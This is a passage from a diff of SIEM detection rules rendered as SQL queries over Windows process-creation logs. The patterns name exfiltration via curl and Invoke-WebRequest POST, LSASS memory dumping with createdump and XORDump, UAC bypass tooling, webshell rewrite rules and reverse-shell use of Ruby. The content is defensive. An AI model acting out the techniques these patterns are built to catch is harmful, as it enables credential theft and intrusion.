- "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "status": "experimental", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Valid user connecting using RDP" + "Legitimate usage of appcmd to add new URL rewrite rules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "status": "experimental", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_wmic_recon_service.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", - "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "status": "experimental", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE 